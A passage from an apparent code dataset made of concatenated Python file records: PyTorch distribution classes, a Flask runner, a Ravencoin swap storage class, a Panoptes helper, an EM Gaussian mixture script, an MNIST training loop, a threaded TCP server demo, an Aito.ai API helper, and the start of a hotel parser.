Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n log_prob = distributions.cauchy.Cauchy(loc=parameters[\"loc\"],\n scale=parameters[\"scale\"]).log_prob(x)\n return log_prob\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n return distributions.cauchy.Cauchy(loc=parameters[\"loc\"],\n scale=parameters[\"scale\"]).rsample()\n\n\nclass LaplaceDistribution(ContinuousDistribution, UnivariateDistribution):\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n self.required_parameters = {\"loc\", \"scale\"}\n self.optional_parameters = {}\n super().__init__()\n\n def _calculate_log_probability(self, x, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n log_prob = distributions.laplace.Laplace(loc=parameters[\"loc\"],\n scale=parameters[\"scale\"]).log_prob(x)\n return log_prob\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n return distributions.laplace.Laplace(loc=parameters[\"loc\"],\n scale=parameters[\"scale\"]).rsample()\n\n\nclass BetaDistribution(ContinuousDistribution, UnivariateDistribution):\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n self.required_parameters = {\"alpha\", \"beta\"}\n self.optional_parameters = {}\n super().__init__()\n\n def _calculate_log_probability(self, x, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n log_prob = distributions.beta.Beta(concentration0=parameters[\"alpha\"],\n concentration1=parameters[\"beta\"]).log_prob(x)\n return log_prob\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n return distributions.beta.Beta(concentration0=parameters[\"alpha\"],\n concentration1=parameters[\"beta\"]).rsample()\n\n\nclass BinomialDistribution(UnivariateDistribution, DiscreteDistribution):\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n self.required_parameters = {\"n\", (\"p\", \"logit_p\")}\n self.optional_parameters = {}\n super().__init__()\n\n def _calculate_log_probability(self, x, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n if \"p\" in parameters:\n log_prob = distributions.binomial.Binomial(total_count=parameters[\"n\"],\n probs=parameters[\"p\"]).log_prob(x)\n\n elif \"logit_p\" in parameters:\n log_prob = distributions.binomial.Binomial(total_count=parameters[\"n\"],\n logits=parameters[\"logit_p\"]).log_prob(x)\n else:\n raise ValueError(\"Either p or \" +\n \"logit_p needs to be provided as input\")\n return log_prob\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n if \"p\" in parameters:\n sample = distributions.binomial.Binomial(total_count=parameters[\"n\"],\n probs=parameters[\"p\"]).sample()\n elif \"logit_p\" in parameters:\n sample = distributions.binomial.Binomial(total_count=parameters[\"n\"],\n logits=parameters[\"logit_p\"]).sample()\n else:\n raise ValueError(\"Either p or \" +\n \"logit_p needs to be provided as input\")\n return sample\n\n","sub_path":"brancher/distributions.py","file_name":"distributions.py","file_ext":"py","file_size_in_byte":19408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"240925095","text":"# author: Bayu Aditya\nimport os\nfrom flask import Flask, render_template\n\nSTATICS_DIR = os.path.abspath(\"frontend/statics\")\nTEMPLATES_DIR = os.path.abspath(\"frontend/templates\")\n\napp = Flask(__name__, template_folder=TEMPLATES_DIR, static_folder=STATICS_DIR)\n\n# GET homepage /\n@app.route(\"/\")\ndef homepage():\n return render_template(\"index.html\")\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)\n","sub_path":"app-runner.py","file_name":"app-runner.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"317370434","text":"from jsonrpcclient.requests import Request\r\nfrom requests import post, get\r\nfrom decimal import *\r\n\r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5 import uic\r\n\r\nimport sys, getopt, argparse, json, time, getpass, os.path\r\nfrom util import *\r\nfrom rvn_rpc import *\r\nfrom config import *\r\n\r\nfrom swap_transaction import SwapTransaction\r\n\r\nclass SwapStorage:\r\n def __init__ (self):\r\n super()\r\n self.swaps = []\r\n self.locks = []\r\n \r\n def load_swaps(self):\r\n if not os.path.isfile(SWAP_STORAGE_PATH):\r\n return []\r\n fSwap = open(SWAP_STORAGE_PATH, mode=\"r\")\r\n swapJson = fSwap.read()\r\n fSwap.close()\r\n self.swaps = json.loads(swapJson, object_hook=SwapTransaction)\r\n print(\"Loaded {} swaps from disk\".format(len(self.swaps)))\r\n return self.swaps\r\n\r\n def save_swaps(self):\r\n swapJson = json.dumps(self.swaps, default=lambda o: o.__dict__, indent=2)\r\n fSwap = open(SWAP_STORAGE_PATH, mode=\"w\")\r\n fSwap.truncate()\r\n fSwap.write(swapJson)\r\n fSwap.flush()\r\n fSwap.close()\r\n \r\n def load_locked(self):\r\n if not os.path.isfile(LOCK_STORAGE_PATH):\r\n return []\r\n fLock = open(LOCK_STORAGE_PATH, mode=\"r\")\r\n lockJson = fLock.read()\r\n fLock.close()\r\n self.locks = json.loads(lockJson)\r\n print(\"Loaded {} locks from disk\".format(len(self.locks)))\r\n return self.locks\r\n\r\n def save_locked(self):\r\n lockJson = json.dumps(self.locks, default=lambda o: o.__dict__, indent=2)\r\n fLock = open(LOCK_STORAGE_PATH, mode=\"w\")\r\n fLock.truncate()\r\n fLock.write(lockJson)\r\n fLock.flush()\r\n fLock.close()\r\n\r\n def add_swap(self, swap):\r\n self.swaps.append(swap)\r\n utxo_parts = swap.utxo.split(\"|\")\r\n self.add_lock(utxo_parts[0], int(utxo_parts[1]))\r\n\r\n def add_lock(self, txid, vout):\r\n for lock in self.locks:\r\n if txid == lock[\"txid\"] and vout == lock[\"vout\"]:\r\n return #Already added\r\n print(\"Locking UTXO {}|{}\".format(txid, vout))\r\n for utxo in self.utxos:\r\n if txid == utxo[\"txid\"] and vout == utxo[\"vout\"]:\r\n self.locks.append({\"txid\": txid, \"vout\": vout, \"type\": \"rvn\", \"amount\": utxo[\"amount\"]})\r\n return #Locking ravencoin\r\n for asset in self.my_asset_names:\r\n for a_utxo in self.assets[asset][\"outpoints\"]:\r\n if txid == a_utxo[\"txid\"] and vout == a_utxo[\"vout\"]:\r\n self.locks.append({\"txid\": txid, \"vout\": vout, \"type\": \"asset\", \"asset\": asset, \"amount\": a_utxo[\"amount\"]})\r\n return #Locking assets\r\n\r\n def refresh_locks(self):\r\n for swap in self.swaps:\r\n if swap.state == \"new\":\r\n utxo_parts = swap.utxo.split(\"|\")\r\n self.add_lock(utxo_parts[0], int(utxo_parts[1]))\r\n\r\n def load_utxos(self):\r\n #Locked UTXO's are excluded from the list command\r\n self.utxos = do_rpc(\"listunspent\")\r\n \r\n #Pull list of assets for selecting\r\n self.assets = do_rpc(\"listmyassets\", asset=\"\", verbose=True)\r\n self.my_asset_names = [*self.assets.keys()]\r\n\r\n total_balance = 0\r\n for utxo in self.utxos:\r\n total_balance += utxo[\"amount\"]\r\n self.balance = total_balance\r\n\r\n def find_utxo(self, type, quantity, name=None, exact=True, skip_locks=False):\r\n #print(\"Find UTXO: {} Exact: {} Skip Locks: {}\".format(quantity, exact, skip_locks))\r\n if type == \"rvn\":\r\n for rvn_utxo in self.utxos:\r\n if(self.is_taken(rvn_utxo, skip_locks)):\r\n continue\r\n if(float(rvn_utxo[\"amount\"]) == float(quantity) and exact) or (rvn_utxo[\"amount\"] >= quantity and not exact):\r\n return rvn_utxo\r\n elif type == \"asset\":\r\n matching_asset = self.assets[name]\r\n if(matching_asset):\r\n if(matching_asset[\"balance\"] < quantity):\r\n return None\r\n for asset_utxo in matching_asset[\"outpoints\"]:\r\n if(self.is_taken(asset_utxo, skip_locks)):\r\n continue\r\n if(float(asset_utxo[\"amount\"]) == float(quantity) and exact) or (asset_utxo[\"amount\"] >= quantity and not exact):\r\n return asset_utxo\r\n return None\r\n\r\n #check if a swap's utxo is still unspent\r\n #if not then the swap has been executed!\r\n def swap_utxo_unspent(self, utxo):\r\n utxo_parts = utxo.split(\"|\")\r\n for utxo in self.utxos:\r\n if utxo[\"txid\"] == utxo_parts[0] and utxo[\"vout\"] == int(utxo_parts[1]):\r\n return True\r\n for asset_name in self.my_asset_names:\r\n for a_utxo in self.assets[asset_name][\"outpoints\"]:\r\n if a_utxo[\"txid\"] == utxo_parts[0] and a_utxo[\"vout\"] == int(utxo_parts[1]):\r\n return True\r\n return False\r\n\r\n def wallet_lock_all_swaps(self):\r\n #first unlock everything\r\n self.wallet_unlock_all()\r\n #now build all orders and send it in one go\r\n locked_utxos = []\r\n for swap in self.swaps:\r\n if swap.state == \"new\":\r\n utxo_parts = swap.utxo.split(\"|\")\r\n locked_utxos.append({\"txid\":utxo_parts[0],\"vout\":int(utxo_parts[1])})\r\n print(\"Locking {} UTXO's for buy orders\".format(len(locked_utxos)))\r\n do_rpc(\"lockunspent\", unlock=False, transactions=locked_utxos)\r\n \r\n def wallet_lock_single(self, swap):\r\n utxo_parts = swap.utxo.split(\"|\")\r\n lock_utxo = [{\"txid\":utxo_parts[0],\"vout\":int(utxo_parts[1])}]\r\n do_rpc(\"lockunspent\", unlock=False, transactions=lock_utxo)\r\n\r\n def wallet_unlock_all(self):\r\n do_rpc(\"lockunspent\", unlock=True)\r\n\r\n def is_taken(self, utxo, skip_locks=False):\r\n if not skip_locks:\r\n for lock in self.locks:\r\n if lock[\"txid\"] == utxo[\"txid\"] and lock[\"vout\"] == utxo[\"vout\"]:\r\n return True\r\n for swap in self.swaps:\r\n expected = \"{}|{}\".format(utxo[\"txid\"], utxo[\"vout\"])\r\n if swap.utxo == expected:\r\n return True\r\n return False\r\n\r\n def locaked_rvn(self, only_orders=True):\r\n total = 0\r\n if only_orders:\r\n for swap in self.swaps:\r\n if swap.type == \"buy\" and swap.state == \"new\":\r\n total += swap.totalPrice()\r\n else:\r\n for lock in self.locks:\r\n if lock[\"type\"] == \"rvn\":\r\n total += lock[\"amount\"]\r\n return total\r\n\r\n def locaked_assets(self, only_orders=True):\r\n total = 0\r\n if only_orders:\r\n for swap in self.swaps:\r\n if swap.type == \"sell\" and swap.state == \"new\":\r\n total += swap.quantity\r\n else:\r\n for lock in self.locks:\r\n if lock[\"type\"] == \"asset\":\r\n total += lock[\"amount\"]\r\n return total","sub_path":"swap_storage.py","file_name":"swap_storage.py","file_ext":"py","file_size_in_byte":6380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"449136860","text":"#!/usr/bin/env python\n\n# ---- Import standard modules to the python path.\n\nfrom panoptes_client import *\nimport re, operator\n\n#This function generically flatten a dict\ndef flatten(d, parent_key='', sep='_'):\n items = []\n for k, v in d.items():\n new_key = parent_key + sep + k if parent_key else k\n try:\n items.extend(flatten(v, new_key, sep=sep).items())\n except:\n items.append((new_key, v))\n return dict(items)\n\ndef getGoldenSubjectSets(ProjectID):\n # now determine infrastructure of workflows so we know what workflow this image belongs in\n workflowGoldenSetDict = {}\n tmp = Project.find(ProjectID)\n project_flat = flatten(tmp.raw)\n order = project_flat['configuration_workflow_order']\n # Determine workflow order\n workflows = [int(str(iWorkflow)) for iWorkflow in order]\n # Determine subject sets and answers\n for iWorkflow in workflows:\n tmp1 = Workflow.find(iWorkflow)\n tmp1 = flatten(tmp1.raw)\n try:\n workflowGoldenSetDict[iWorkflow] = tmp1['configuration_gold_standard_sets']\n except:\n workflowGoldenSetDict[iWorkflow] = []\n\n return workflowGoldenSetDict\n\ndef getGoldenImages(workflowGoldenSetDict):\n workflowGoldenSetImagesDict = {}\n\n for iWorkflow in workflowGoldenSetDict.keys():\n goldenImages = {}\n\n for iGoldenSubjectSet in workflowGoldenSetDict[iWorkflow]:\n tmp = SubjectSet.find(iGoldenSubjectSet)\n tmpSubjects = tmp.subjects()\n\n while True:\n try:\n nextSubject = tmpSubjects.next()\n goldenImages[str(nextSubject.id)] = [str(nextSubject.raw['metadata']['subject_id']), str(nextSubject.raw['metadata']['#Label'])]\n except:\n break\n\n workflowGoldenSetImagesDict[iWorkflow] = goldenImages\n\n return workflowGoldenSetImagesDict\n\ndef getGoldenImagesAsInts(workflowGoldenSetDict):\n from pyomega.API.getLabelDict import getAnswers\n import pandas as pd\n\n answers = getAnswers('1104')\n answersDictRev = dict(enumerate(sorted(answers[2360].keys())))\n answersDict = dict((str(v),k) for k,v in answersDictRev.iteritems())\n\n goldenImagesList = []\n\n for iWorkflow in sorted(workflowGoldenSetDict.keys()):\n\n if not workflowGoldenSetDict[iWorkflow]:\n continue\n\n for iGoldenSubjectSet in workflowGoldenSetDict[iWorkflow]:\n\n tmp = SubjectSet.find(iGoldenSubjectSet)\n tmpSubjects = tmp.subjects()\n\n while True:\n try:\n nextSubject = tmpSubjects.next()\n goldenImagesList.append([int(nextSubject.id), answersDict[str(nextSubject.raw['metadata']['#Label']).upper().translate(None,'() ')],nextSubject.raw['metadata']['subject_id']])\n except:\n break\n\n return pd.DataFrame(goldenImagesList,columns=['links_subjects', 'GoldLabel', 'uniqueID'])\n\n","sub_path":"pyomega/API/getGoldenImages.py","file_name":"getGoldenImages.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"291379963","text":"import random\nimport math \nimport matplotlib.pyplot as plt\n\ndef estimation(mean,var,prior,llist):\n\n\tpg0x=[]\n\tpg1x=[]\n\tpg2x=[]\n\tll=[]\n\tll0=ll1=ll2=0\n\tfor xi in llist:\n\n\t\tpxg0= (math.exp(-(((xi-mean[0])*(xi-mean[0]))/2/var[0]/var[0])))/math.sqrt(2*3.14156)/var[0]\n\t\tpxg1= (math.exp(-(((xi-mean[1])*(xi-mean[1]))/2/var[1]/var[1])))/math.sqrt(2*3.14156)/var[1]\n\t\tpxg2= (math.exp(-(((xi-mean[2])*(xi-mean[2]))/2/var[2]/var[2])))/math.sqrt(2*3.14156)/var[2]\n\n\n\t\tll0 = ll0 + pxg0\n\t\tll1 = ll1 + pxg1\n\t\tll2 = ll2 + pxg2\n\n\t\tnumerator = pxg0 * prior[0]\n\t\tdenominator = pxg0 * prior[0] + pxg1 * prior[1] + pxg2 * prior[2] \n\t\tpg0x.append(numerator/denominator)\n\n\t\tnumerator = pxg1 * prior[1]\n\t\tpg1x.append(numerator/denominator)\n\n\t\tnumerator = pxg2 * prior[2]\n\t\tpg2x.append(numerator/denominator)\n\n\tll.append(ll0)\n\tll.append(ll1)\n\tll.append(ll2)\n\treturn pg0x,pg1x,pg2x,ll\n\n\n\ndef maximization(g0,g1,g2,nlist):\n\n\tn0=n1=n2=0.0\n\tnume0=nume1=nume2=0\n\tnume00=nume11=nume22=0\n\tm=[]\n\tv=[]\n\tp=[]\n\n\tfor i0 in g0:\n\t\tn0 = n0 + i0\n\tfor i1 in g1:\n\t\tn1 = n1 + i1\n\tfor i2 in g2:\n\t\tn2 = n2 + i2\n\n\t'''print('NRWWE\\n')\n\t\t\t\tprint(n1)\n\t\t\t\tprint('\\n')'''\n\tfor a0,b0 in zip(g0,nlist):\n\t\tnume0 = nume0 + a0*b0\n\t\tnume00 = nume00 + a0*b0*b0\n\tfor a1,b1 in zip(g1,nlist):\n\t\tnume1 = nume1 + a1*b1\n\t\tnume11 = nume11 + a1*b1*b1\n\tfor a2,b2 in zip(g2,nlist):\n\t\tnume2 = nume2 + a2*b2\n\t\tnume22 = nume22 + a2*b2*b2\t\n\n\ttry:\n\t\tm.append(nume0/n0)\n\t\tm.append(nume1/n1)\n\t\tm.append(nume2/n2)\n\n\t\tv.append(math.sqrt((nume00/n0)-(m[0]*m[0])))\n\t\tv.append(math.sqrt((nume11/n1)-(m[1]*m[1])))\n\t\tv.append(math.sqrt((nume22/n2)-(m[2]*m[2])))\n\n\t\tp.append(n0/(n0+n1+n2))\n\t\tp.append(n1/(n0+n1+n2))\n\t\tp.append(n2/(n0+n1+n2))\n\texcept:\n\t\tprint('division by zero')\n\n\n\treturn m,v,p\n\n\ndef main():\n\ttext_file = open(\"data1.txt\",\"r\")\n\tinputValues = text_file.read().split('\\n')\n\ttext_file.close()\n\tnew_list=[]\n\tfor i in inputValues:\n\t\tif(i!=''):\n\t\t\tnew_list.append(float(i))\n\n\t#print(new_list)\n\tmean=[]\n\tvar=[]\n\t#mean.append(random.random())\n\tmean.append(random.randint(-30,100))\n\tvar.append(1002)\n\n\t#mean.append(random.random())\n\tmean.append(random.randint(-30,60))\n\tvar.append(5005)\n\n\t#mean.append(random.random())\n\tmean.append(random.randint(-70,150))\n\tvar.append(9009)\n\n\tprior = [.33,.33,.34]\n\n\titeration = 0\n\tlogLikelihood=0\n\ttemp = logLikelihood\n\tdell=1\n\tllhood=[]\n\t\n\tpit=[]\t\t\t\n\twhile True:\n\t\tif(dell < .001):\n\t\t\tbreak\n\t\telse:\n\t\t\tg0,g1,g2,ll = estimation(mean,var,prior,new_list)\n\t\t\tlogLikelihood = math.log(prior[0]*ll[0]+prior[1]*ll[1]+prior[2]*ll[2])\n\t\t\tmean,var,prior = maximization(g0,g1,g2,new_list)\n\t\t\t\n\t\t\t#print(logLikelihood)\n\t\t\tllhood.append(logLikelihood)\n\t\t\tpit.append(iteration)\n\t\t\titeration = iteration + 1\n\t\t\tdell = abs(logLikelihood - temp)\n\t\t\ttemp = logLikelihood\n\t\t\t\n\t\n\tplt.plot(pit,llhood)\n\tplt.ylabel('Log Likelihood')\n\tplt.xlabel('Training Time')\n\tplt.show()\nmain()\n\n","sub_path":"EM_algo_simple_version.py","file_name":"EM_algo_simple_version.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"67821659","text":"from Order import Order\nfrom Truck import Truck\nfrom Action import Action\nfrom Plan import Plan\nfrom PlanLEM import PlanLEM\nfrom Storage import Storage\nfrom typing import List\nimport numpy as np\n\n\nclass ApproachFirst:\n\n @staticmethod\n def getBestOrder(trunk: Truck, orders: List[Order]):\n orders_values = np.array([(order.value() - order.cost() + trunk.costToOrderStart(order)) for order in orders])\n best_value = np.argmax(orders_values)\n return orders[best_value]\n\n\nclass ApproachSecond:\n\n @staticmethod\n def getBestPlan(trunk: Truck, orders: List[Order]):\n actions = []\n for order in orders:\n action = Action(order)\n order.setAction(action)\n actions.append(action)\n\n plan_1 = Plan(len(actions), actions)\n plan_2 = Plan(len(actions), actions)\n plan_3 = Plan(len(actions), actions)\n\n best_plan = Plan.getBestOfPlans(plan_1, plan_2, plan_3)\n\n trunk.setPlan(best_plan)\n return best_plan\n\n\nclass ApproachThird:\n\n @staticmethod\n def getBestPlan(trunk: Truck, orders: List[Order]):\n actions = []\n storage = []\n for order in orders:\n action = Action(order)\n order.setAction(action)\n storage_temp = Storage(action)\n actions.append(action)\n storage.append(storage_temp)\n\n plan_1 = PlanLEM(len(storage), trunk, storage)\n plan_2 = PlanLEM(len(storage), trunk, storage)\n plan_3 = PlanLEM(len(storage), trunk, storage)\n\n best_plan = PlanLEM.getBestOfPlans(plan_1, plan_2, plan_3)\n return best_plan\n","sub_path":"Assistant.py","file_name":"Assistant.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"212244862","text":"import os\nimport socket\nimport threading\nimport SocketServer\nimport codecs\ndef client(ip,port,message):\n sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n sock.connect((ip,port))\n try:\n sock.sendall(message.encode(\"utf-8\"))\n response=sock.recv(1024)\n print(\"Client received:%s\"%response.decode(\"utf-8\"))\n finally:\n sock.close()\n\nclass ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):\n def handle(self):\n data=self.request.recv(1024)\n current_thread=threading.current_thread()\n response=\"%s: %s\"%(current_thread,data)\n self.request.sendall(response)\n\nclass ThreadedTCPServer(SocketServer.ThreadingMixIn,SocketServer.TCPServer):\n pass\n\nif __name__=='__main__':\n server=ThreadedTCPServer((socket.gethostname(),8080),ThreadedTCPRequestHandler)\n ip,port=server.server_address\n server_thread=threading.Thread(target=server.serve_forever)\n server_thread.daemon=True\n server_thread.start()\n print(\"Server loop running on thread: \",server_thread.name)\n client(ip,port,\"Hello from client 1\")\n client(ip,port,\"Hello from client 2\")\n client(ip,port,\"Hello from client 3\")\n server.shutdown()","sub_path":"pytest/Threading.py","file_name":"Threading.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"415686038","text":"import sys\nfrom workflow import Workflow\n\ndef main(wf):\n\n items = [\n {\n 'title': 'Doc',\n 'arg': 'docs',\n 'icon': 'doc.png'\n },\n {\n 'title': 'Sheet',\n 'arg': 'sheets',\n 'icon': 'sheet.png'\n },\n {\n 'title': 'Slide',\n 'arg': 'slides',\n 'icon': 'slide.png'\n },\n {\n 'title': 'Form',\n 'arg': 'forms',\n 'icon': 'form.png'\n },\n {\n 'title': 'Drawing',\n 'arg': 'drawings',\n 'icon': 'drawing.png'\n },\n ]\n\n for item in items:\n wf.add_item(title=item['title'],\n subtitle='Create New Google {}'.format(item['title']),\n autocomplete=item['title'],\n arg=item['arg'],\n valid=True,\n icon='icons/{}'.format(item['icon']))\n\n wf.send_feedback()\n\n\nif __name__ == u\"__main__\":\n wf = Workflow()\n sys.exit(wf.run(main))\n\n","sub_path":"drive_create.py","file_name":"drive_create.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"559775342","text":"from __future__ import print_function\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nprint(\"downloading mnist data...\")\nmnist = input_data.read_data_sets(\n \"mnist/input_data\", source_url=\"http://yann.lecun.com/exdb/mnist/\", one_hot=True)\n\nimport tensorflow as tf\nfrom model import SecurityGradePredictor\nfrom time import strftime\nimport data as dat\nimport os\n\nEPOCH_SIZE = 5000\nHIDDEN_SIZE = 200\nNUM_LAYERS = 5\nBATCH_SIZE = 100\nW_SIZE = NUM_LAYERS\nMAX_STEP = 28\nFEAT_SIZE = 28\nNUM_CLASSES = 10\nLEARNING_RATE = 1e-4\nLOG_DIR = 'logdir'\n\nif __name__ == '__main__':\n if tf.io.gfile.exists(LOG_DIR):\n tf.io.gfile.rmtree(LOG_DIR)\n tf.io.gfile.makedirs(LOG_DIR)\n\n data = tf.compat.v1.placeholder(tf.float32, [None, MAX_STEP, FEAT_SIZE])\n target = tf.compat.v1.placeholder(tf.float32, [None, NUM_CLASSES])\n training = tf.compat.v1.placeholder(tf.bool)\n model = SecurityGradePredictor(\n data, target, W_SIZE, training, num_hidden=HIDDEN_SIZE, num_layers=NUM_LAYERS, learning_rate=LEARNING_RATE)\n saver = tf.compat.v1.train.Saver()\n with tf.compat.v1.Session() as sess:\n summary_writer = tf.compat.v1.summary.FileWriter(LOG_DIR, sess.graph)\n sess.run(tf.compat.v1.global_variables_initializer())\n tf.compat.v1.summary.scalar(\"Train Loss\", model.cost)\n tf.compat.v1.summary.scalar(\"Train Accuracy\", model.accuracy*100)\n summary = tf.compat.v1.summary.merge_all()\n bno = 0\n for epoch in range(EPOCH_SIZE):\n bno = epoch*50\n for i in range(50):\n bno = bno+1\n print('{} loading training data for batch {}...'.format(\n strftime(\"%H:%M:%S\"), bno))\n batch_x, batch_y = mnist.train.next_batch(\n batch_size=BATCH_SIZE)\n batch_x = batch_x.reshape((BATCH_SIZE, MAX_STEP, FEAT_SIZE))\n print('{} training...'.format(strftime(\"%H:%M:%S\")))\n summary_str, _ = sess.run([summary, model.optimize], {\n data: batch_x, target: batch_y, training: True})\n summary_writer.add_summary(summary_str, bno)\n summary_writer.flush()\n # print('{} tagging data as trained, batch no: {}'.format(\n # strftime(\"%H:%M:%S\"), bno))\n # dat.tagDataTrained(uuid, bno)\n print('{} running on test set...'.format(strftime(\"%H:%M:%S\")))\n test_data = mnist.test.images.reshape((-1, MAX_STEP, FEAT_SIZE))\n test_label = mnist.test.labels\n accuracy = sess.run(\n model.accuracy, {data: test_data, target: test_label, training: False})\n print('{} Epoch {:4d} test accuracy {:3.3f}%'.format(\n strftime(\"%H:%M:%S\"), epoch + 1, 100 * accuracy))\n checkpoint_file = os.path.join(LOG_DIR, 'model.ckpt')\n saver.save(sess, checkpoint_file,\n global_step=bno)\n","sub_path":"pstk/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"18017656","text":"import requests\nfrom requests.structures import CaseInsensitiveDict\nimport json\nimport random\n\nurl = 'https://junction2020.aito.app/api/v1'\napi_key = \"0pJDlYxnu29G4fB52vqFe6OW6DfgfOt7a96WkrnM\" # public read API-key\nheaders = CaseInsensitiveDict()\nteams_ids = set()\nheaders[\"x-api-key\"] = api_key\nheaders[\"Content-Type\"] = \"application/json\"\n\n\ndef return_schema(): # for getting a schema of a project\n return requests.get(url+'/schema', headers=headers).json()\n\n\ndef get_item(usr_location: str, props: dict, limit: int, offset: int): # Props are required to be as in an example in Aito.ai API\n data = dict()\n data[\"from\"] = usr_location\n data[\"where\"] = props\n data[\"limit\"] = limit\n data[\"offset\"] = offset\n data = json.dumps(data)\n\n return requests.post(url+'/_search', data=data, headers=headers).json()\n\n\ndef create_an_entry(props: dict, table: str): # props should correspond to their schemas in a database\n return requests.post(url+'/data/{}'.format(table), data=props, headers=headers).json()\n\n\ndef create_an_entry_batch(props: list, table: str): # props is a list of props-dicts(refer to create_an_entry)\n result = list()\n for i in props:\n result.append(requests.post(url+'/data/{}'.format(table), data=i, headers=headers).json())\n return result\n\ndef delete(where_to_delete: str, what_to_delete: dict): # to remove an entry. What_to_delete is a dict just like in get_item\n data = dict()\n data[\"from\"] = where_to_delete\n data[\"where\"] = what_to_delete\n data = json.dumps(data)\n return requests.post(url+'/data/_delete', headers=headers, data=data).json()\n\n\ndef recommend(team: list): # team is a list of dicts of users, formed by client\n data = dict()\n data[\"from\"] = \"ratings\"\n if len(team) == 1:\n data[\"where\"] = {\"userID\": team[0]}\n else:\n data[\"where\"] = {\"$and\": list({\"userID\": i} for i in team)}\n data[\"recommend\"] = \"placeID\"\n data[\"goal\"] = {\"rating\": 2}\n data = json.dumps(data)\n return requests.post(url+ '/_recommend', headers=headers, data=data).json()\n\n\ndef create_team(team: list): # list of userid's. Assume that we have a field \"teams\" in user's field\n unique_id = ''\n alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_+'\n for i in range(10):\n unique_id += alphabet[random.randint(0, 64)]\n while unique_id in teams_ids:\n unique_id = ''\n for i in range(10):\n unique_id += alphabet[random.randint(0, 64)]\n teams_ids.add(unique_id)\n for i in team:\n data = dict()\n data[\"from\"] = \"users\"\n data[\"where\"] = {\"userID\": i}\n result = requests.post(url+'/_search', headers=headers, data=data)\n if result.status_code >= 400:\n raise ConnectionError\n else:\n requests.post(url+'/data/_delete', headers=headers, data=data)\n result = result.json()\n result[\"teams\"] += unique_id+';' # teams field -- list of team-ids separated with ;\n result = json.dumps(result)\n create_an_entry(result, 'users')\n\n\ndef delete_team(team_id: str):\n data = dict()\n data[\"from\"] = \"users\"\n data[\"where\"] = {\"teams\": team_id}\n result = get_item('users', data[\"where\"], 100000, 0)\n for i in result:\n teams = result[i][\"teams\"].split(\";\")\n del teams[teams.index(team_id)]\n new = ''\n for j in teams:\n new += j\n new += ';'\n new = new[:-1]\n result[i][\"teams\"] = new\n delete('users', {\"userID\": result[i][\"userID\"]})\n create_an_entry(result[i], 'users')\n\n\n\n# print(recommend([{\n# \"activity\": \"student\",\n# \"ambience\": \"family\",\n# \"birth_year\": 1989,\n# \"budget\": \"medium\",\n# \"color\": \"black\",\n# \"cuisine\": \"American\",\n# \"dress_preference\": \"informal\",\n# \"drink_level\": \"abstemious\",\n# \"height\": 1.77,\n# \"hijos\": \"independent\",\n# \"interest\": \"variety\",\n# \"latitude\": 22.139997,\n# \"longitude\": -100.978803,\n# \"marital_status\": \"single\",\n# \"payment\": \"cash\",\n# \"personality\": \"thrifty-protector\",\n# \"religion\": \"none\",\n# \"smoker\": \"false\",\n# \"transport\": \"on foot\",\n# \"userID\": \"U1001\",\n# \"weight\": 69\n# }, {\n# \"activity\": \"student\",\n# \"ambience\": \"family\",\n# \"birth_year\": 1990,\n# \"budget\": \"low\",\n# \"color\": \"red\",\n# \"cuisine\": \"Mexican\",\n# \"dress_preference\": \"informal\",\n# \"drink_level\": \"abstemious\",\n# \"height\": 1.87,\n# \"hijos\": \"independent\",\n# \"interest\": \"technology\",\n# \"latitude\": 22.150087,\n# \"longitude\": -100.983325,\n# \"marital_status\": \"single\",\n# \"payment\": \"cash\",\n# \"personality\": \"hunter-ostentatious\",\n# \"religion\": \"Catholic\",\n# \"smoker\": \"false\",\n# \"transport\": \"public\",\n# \"userID\": \"U1002\",\n# \"weight\": 40\n# }]))\n# print(create_team(['abacabba']))","sub_path":"api requester.py","file_name":"api requester.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"426342257","text":"from hotel import HotelParser\n\nclass ExpediaParser(HotelParser):\n\n\tdef __init__(self, 